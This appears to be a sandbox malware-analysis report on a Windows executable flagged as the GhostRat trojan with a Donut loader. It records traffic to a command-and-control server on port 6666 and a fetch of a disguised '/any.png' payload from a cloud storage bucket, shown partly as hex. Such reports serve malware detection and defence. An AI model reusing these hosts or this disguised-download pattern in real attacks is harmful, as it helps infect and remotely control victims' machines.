                        Jul 5, 2024 07:33:09.661463022 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.662019968 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.662075043 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.662107944 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.662194014 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.662199974 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.662235022 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.662261963 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.662267923 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.662324905 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.663288116 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.663341045 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.663374901 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.663397074 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.663445950 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.663503885 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.871095896 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871134043 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871191025 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871225119 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871278048 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871311903 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871319056 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.871319056 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.871345997 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871350050 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.871819019 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871876955 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.871879101 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871915102 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871965885 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.871967077 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.871999979 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.872037888 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.872054100 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.872657061 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.872710943 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.872729063 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.872764111 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.872811079 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.873001099 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.873054981 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.873090029 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.873101950 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.873183012 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.873218060 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.873233080 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.873253107 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.873298883 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.873995066 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874043941 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874095917 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874098063 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.874130011 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874165058 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874176979 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.874205112 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874252081 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.874766111 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874799013 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874845028 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.874849081 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874890089 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874922037 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:09.874942064 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:09.923052073 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.081779003 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.081862926 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.081913948 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.081949949 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082001925 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082035065 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082035065 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082037926 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082087040 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082091093 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082125902 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082159996 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082195044 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082195997 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082241058 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082355022 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082390070 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082431078 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082444906 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082799911 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082848072 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082855940 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082870960 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.082921028 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.082995892 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083030939 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083065033 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083093882 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.083101988 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083151102 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.083225012 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083272934 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083306074 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083314896 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.083873034 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083905935 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083930969 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.083940029 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.083985090 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.084041119 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084074974 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084109068 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084121943 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.084146023 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084192038 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.084271908 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084305048 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084340096 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084362030 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.084721088 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084769964 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.084842920 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084894896 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084929943 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084961891 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.084975004 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.084996939 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085014105 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085036993 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085088968 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085133076 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085180044 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085215092 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085227966 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085741997 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085774899 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085792065 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085809946 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085854053 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085863113 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085896969 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085930109 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085941076 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085966110 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.086010933 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.086087942 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.126178026 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294399023 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294440985 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294497013 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294543982 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294579983 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294612885 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294631004 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294631004 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294647932 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294656992 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294796944 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294831038 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294842958 CEST497316666192.168.2.4206.238.115.146
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jul 5, 2024 07:33:02.446135998 CEST | 58820 | 53 | 192.168.2.4 | 1.1.1.1
                        Jul 5, 2024 07:33:02.773952961 CEST | 53 | 58820 | 1.1.1.1 | 192.168.2.4

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Jul 5, 2024 07:33:02.446135998 CEST | 192.168.2.4 | 1.1.1.1 | 0x573c | Standard query (0) | pattern-1326658104.cos.ap-guangzhou.myqcloud.com | A (IP address) | IN (0x0001) | false

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jul 5, 2024 07:33:02.773952961 CEST | 1.1.1.1 | 192.168.2.4 | 0x573c | No error (0) | pattern-1326658104.cos.ap-guangzhou.myqcloud.com | gz.file.myqcloud.com | - | CNAME (Canonical name) | IN (0x0001) | false
                        Jul 5, 2024 07:33:02.773952961 CEST | 1.1.1.1 | 192.168.2.4 | 0x573c | No error (0) | gz.file.myqcloud.com | - | 159.75.57.35 | A (IP address) | IN (0x0001) | false
                        Jul 5, 2024 07:33:02.773952961 CEST | 1.1.1.1 | 192.168.2.4 | 0x573c | No error (0) | gz.file.myqcloud.com | - | 159.75.57.69 | A (IP address) | IN (0x0001) | false
                        Jul 5, 2024 07:33:02.773952961 CEST | 1.1.1.1 | 192.168.2.4 | 0x573c | No error (0) | gz.file.myqcloud.com | - | 159.75.57.36 | A (IP address) | IN (0x0001) | false
                        • pattern-1326658104.cos.ap-guangzhou.myqcloud.com
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.4 | 49730 | 159.75.57.35 | 443 | 7272 | C:\Users\user\Desktop\2IVWAPeiZm.exe

                        Timestamp | Bytes transferred | Direction | Data
                        2024-07-05 05:33:04 UTC | 137 | OUT | GET /any.png HTTP/1.1
                            User-Agent: WinINetDownloader
                            Host: pattern-1326658104.cos.ap-guangzhou.myqcloud.com
                            Cache-Control: no-cache
                        2024-07-05 05:33:04 UTC | 421 | IN | HTTP/1.1 200 OK
                            Content-Type: image/png
                            Content-Length: 1107015
                            Connection: close
                            Accept-Ranges: bytes
                            Content-Disposition: attachment
                            Date: Fri, 05 Jul 2024 05:33:04 GMT
                            ETag: "c5497a158a878995bb05025560ddaec2"
                            Last-Modified: Wed, 19 Jun 2024 03:33:16 GMT
                            Server: tencent-cos
                            x-cos-force-download: true
                            x-cos-hash-crc64ecma: 16225716134087835629
                            x-cos-request-id: NjY4Nzg1OTBfYTkyZTJjMGJfMjU2ZTBfNGMzYWMw
                        2024-07-05 05:33:05 UTC8184INData Raw: 62 d5 e1 b5 c2 7f 9f f3 ad 63 5e 56 da 2b f7 cd 45 ea 00 b1 23 ed c3 62 33 e4 af c2 16 f9 9a 0d ea 85 fe 34 7f fc 45 50 b0 7e 58 ef 3e e8 72 33 7f 54 e8 66 dd 1f 7f e6 76 58 b7 58 c5 f0 b8 87 2b 36 ba cf 3e c7 ad 75 f7 6e 76 0c 12 fa e3 30 93 78 e8 66 76 74 27 bd 28 ad 31 1b 05 1e 06 62 18 5b eb 86 c5 1a f4 64 e0 1c df 33 1c f1 a5 99 a5 85 ff 3c 34 25 ed 95 a6 95 00 1f 8c 8f 79 1e 7b 9a 00 03 3c d2 72 e5 ec 16 98 8a 18 5c 60 37 1e ab 3f 5a d3 15 70 f1 b1 f7 58 e3 05 be 40 49 78 a5 52 a4 4d 87 bb a3 53 01 59 1c b4 a3 67 d4 0f 55 63 c3 99 76 8f ba fb f5 fa 1c d4 c6 22 17 76 c5 70 9b 83 4d 6e ee 87 75 0f dd 8b 27 dd ad 8f e5 39 bd 77 eb 47 3f cc cc ba 5d af d7 1e 0f dd cc fd 29 f7 d0 e4 90 be 7b 0f 7e 42 27 53 bf f7 78 f4 07 ba 3b a9 90 d9 d1 1f fa 75 d8 23
                        Data Ascii: bc^V+E#b34EP~X>r3TfvXX+6>unv0xfvt'(1b[d3<4%y{<r\`7?ZpX@IxRMSYgUcv"vpMnu'9wG?]){~B'Sx;u#
                        2024-07-05 05:33:05 UTC8184INData Raw: e6 dc c9 21 35 9e 7a 26 5c a7 cf 7d 4e 1f 7d 21 31 0a b8 3b 7e 0e 86 0c 7b 2c ba e8 01 54 84 92 55 45 9a f3 d9 97 f2 c1 c9 f1 a4 8d 43 13 c4 4e 8d 14 66 a5 60 f9 95 36 2f c3 04 32 8c 03 78 d5 29 e8 70 3e c9 ec 95 b6 da 3c 85 c0 00 b9 5a 69 5f f2 ca 46 b1 57 be c5 e7 d3 9a f3 eb a8 9c e5 12 9f 2f d7 c7 0a 65 e9 0c f3 ed a5 80 d0 e6 e5 e4 99 8a ac 57 1b 94 1a 0d f4 cb 94 a1 40 c8 96 0b 72 24 bf 6a b4 a5 40 34 d9 d2 6e 11 c0 6c b4 de 84 97 54 44 fc 5d e1 bf 79 9e 85 25 5c 92 ff 2f dd 2f 5e e7 11 80 15 4a 82 83 f0 93 05 0a 3f 09 9e 44 7f 8d fd 00 a7 13 6d 9e 1e 3b 0e dd b5 d7 e7 cc 27 93 2f c1 02 3f 1c c7 b4 e2 9b fb 74 42 ec d5 92 66 e4 cf 36 9c b2 10 f3 a0 73 be 79 c8 86 c1 97 dc cc be 18 1f 8e 79 db 48 59 5f 4a fe 55 fc ce fe 95 68 ee a0 25 40 0c c4 66 e9
                        Data Ascii: !5z&\}N}!1;~{,TUECNf`6/2x)p><Zi_FW/eW@r$j@4nlTD]y%\//^J?Dm;'/?tBf6syyHY_JUh%@f



                        Target ID:0
                        Start time:01:33:01
                        Start date:05/07/2024
                        Path:C:\Users\user\Desktop\2IVWAPeiZm.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\2IVWAPeiZm.exe"
                        Imagebase:0x7ff6f6080000
                        File size:11'845'632 bytes
                        MD5 hash:06592A8CA068935D98A5ADA152E3393D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112489647.000001CFB9530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2285778041.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629266568.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3349240156.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3706740100.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3726196823.000001CFB9241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1748764856.000001CFB924D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2820150176.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368802529.000001CFB923B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1748942831.000001CFB9250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368874986.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3919845681.000001CFBA3F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2820582683.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1748764856.000001CFB9216000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1797698380.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3900454177.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1797698380.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3726241114.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3726279645.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3900337582.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629229655.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2820366657.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181430469.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113444705.000001CFBA432000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181505839.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3919777549.000001CFB9246000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2285716468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113319605.000001CFBA3BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629266568.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1925226889.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2453865521.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113072764.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3919809789.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3006787705.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112427817.000001CFB9470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2453718670.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3535968647.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1925169796.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181469055.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4111676483.000001CFB9200000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2107170872.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629153864.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368840828.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2107104468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368874986.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181505839.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113319605.000001CFBA310000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false


                          Execution Graph

                          Execution Coverage:6.8%
                          Dynamic/Decrypted Code Coverage:86.6%
                          Signature Coverage:26.3%
                          Total number of Nodes:670
                          Total number of Limit Nodes:80
